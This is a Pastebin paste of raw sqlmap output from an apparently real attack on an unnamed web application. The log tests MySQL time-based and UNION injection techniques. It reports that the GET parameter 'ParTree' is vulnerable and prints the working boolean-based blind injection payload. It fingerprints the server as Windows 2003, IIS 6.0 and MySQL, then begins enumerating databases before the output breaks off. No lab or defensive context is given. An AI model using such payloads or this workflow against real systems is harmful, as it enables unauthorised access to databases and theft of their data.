API tools faq
paste
Guest User

Untitled

a guest
Jun 24th, 2018
98
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.51 KB | None | 0 0
raw download clone embed print report
  1. [02:23:19] [INFO] testing 'MySQL > 5.0.11 OR time-based blind'
  2. [02:23:25] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
  3. [02:23:29] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
  4. [02:24:07] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
  5. [02:24:37] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns'
  6. [02:25:05] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns'
  7. [02:25:53] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns'
  8. [02:26:25] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns'
  9. [02:27:08] [INFO] testing 'MySQL UNION query (NULL) - 31 to 40 columns'
  10. [02:27:50] [INFO] testing 'MySQL UNION query (NULL) - 31 to 40 columns'
  11. [02:28:26] [INFO] testing 'MySQL UNION query (NULL) - 41 to 50 columns'
  12. [02:28:59] [INFO] testing 'MySQL UNION query (NULL) - 41 to 50 columns'
  13. [02:29:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
  14. [02:29:57] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
  15. [02:30:30] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
  16. [02:31:03] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
  17. [02:31:30] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
  18. [02:32:00] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
  19. [02:32:42] [INFO] testing 'Generic UNION query (NULL) - 31 to 40 columns'
  20. [02:33:14] [INFO] testing 'Generic UNION query (NULL) - 31 to 40 columns'
  21. [02:33:42] [INFO] testing 'Generic UNION query (NULL) - 41 to 50 columns'
  22. [02:34:09] [INFO] testing 'Generic UNION query (NULL) - 41 to 50 columns'
  23. GET parameter 'ParTree' is vulnerable. Do you want to keep testing the others? [y/N] n
  24. sqlmap identified the following injection points with a total of 313 HTTP(s) requests:
  25. ---
  26. Place: GET
  27. Parameter: ParTree
  28. Type: boolean-based blind
  29. Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
  30. Payload: A=p&ParTree=-63')) AND 840=840# AND (('gGRl' LIKE 'gGRl
  31. ---
  32.  
  33. [02:36:42] [INFO] testing MySQL
  34. [02:36:48] [INFO] confirming MySQL
  35. [02:36:53] [INFO] the back-end DBMS is MySQL
  36. web server operating system: Windows 2003
  37. web application technology: ASP.NET, Microsoft IIS 6.0
  38. back-end DBMS: MySQL >= 5.0.0
  39. [02:36:53] [INFO] fetching database names
  40. [02:36:53] [INFO] fetching number of databases
  41. [02:36:53] [INFO] retrieved:
  42. [02:37:05] [ERROR] unable to retrieve the number of databases
  43. [02:37:05] [INFO] falling back to current database
  44. [02:37:05] [INFO] fetching current database
  45. [02:37:05] [INFO] retrieved:
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!